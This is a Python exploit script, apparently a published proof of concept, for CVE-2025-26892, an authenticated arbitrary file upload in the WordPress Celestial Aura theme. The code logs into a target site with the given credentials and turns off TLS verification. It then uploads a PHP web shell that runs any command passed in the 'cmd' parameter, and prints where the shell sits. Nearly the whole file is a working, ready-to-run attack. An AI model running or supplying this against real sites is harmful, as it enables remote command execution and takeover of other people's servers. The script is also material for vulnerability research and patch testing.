import argparse
import requests
import time

#By Nxploited ( Khaled_alenazi)

parser = argparse.ArgumentParser(
    description="CVE-2025-26892 | WordPress Celestial Aura Theme <= 2.2 Arbitrary File Upload (Authenticated) - by Khaled Alenazi (Nxploited)"
)
parser.add_argument("--url", "-u", required=True)
parser.add_argument("--username", "-un", required=True)
parser.add_argument("--password", "-p", required=True)
args = parser.parse_args()

session = requests.Session()
session.verify = False
requests.packages.urllib3.disable_warnings()

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"}

login_url = args.url + "/wp-login.php"
login_data = {
    "log": args.username,
    "pwd": args.password,
    "rememberme": "forever",
    "wp-submit": "Log In"
}

print("\n==============================")
print("[*] Logging in to WordPress...")
print("==============================")

response = session.post(login_url, data=login_data, headers=headers)
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("[+] Login successful!")
else:
    print("[-] Login failed.")
    exit()

time.sleep(3)

upload_url = args.url + "/wp-admin/admin.php?page=CA-settings"
exploit_data = {
    "CA_bgcolor": "97C7F7",
    "CA_blogtitle": "yes",
    "CA_hdrimage": "yes",
    "CA_hdrimageheight": "125",
    "CA_hdrimagepath": "",
    "CA_navbar": "pages",
    "CA_search": "yes",
    "CA_rssicon": "yes",
    "CA_postauthor": "yes",
    "CA_postdate": "yes",
    "CA_postcategory": "yes",
    "CA_posttags": "yes",
    "CA_footertext": "©2025 Nxploit ( Ethical hacking )",
    "CA_save": "Save changes",
    "action": "CA_save"
}
exploit_files = {
    "file-header": (
        "nxploit.php",
        "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>",
        "application/x-php"
    )
}

print("\n==============================")
print("[*] Uploading shell...")
print("==============================")

response = session.post(upload_url, headers=headers, files=exploit_files, data=exploit_data)

if response.status_code == 200:
    print("[+] Exploit sent successfully.")
    print("\n==============================")
    print("[+] Form Fields Sent:")
    print("==============================")
    for key in exploit_data:
        print(f"  - {key}: {exploit_data[key]}")
    print("\n==============================")
    print("[+] Shell Location:")
    print("==============================")
    print(f"{args.url}/wp-content/uploads/nxploit.php")
    print("\n==============================")
    print("Exploit By: Khaled_alenazi (Nxploited)")
    print("==============================")
else:
    print("[-] Exploit failed. HTTP", response.status_code)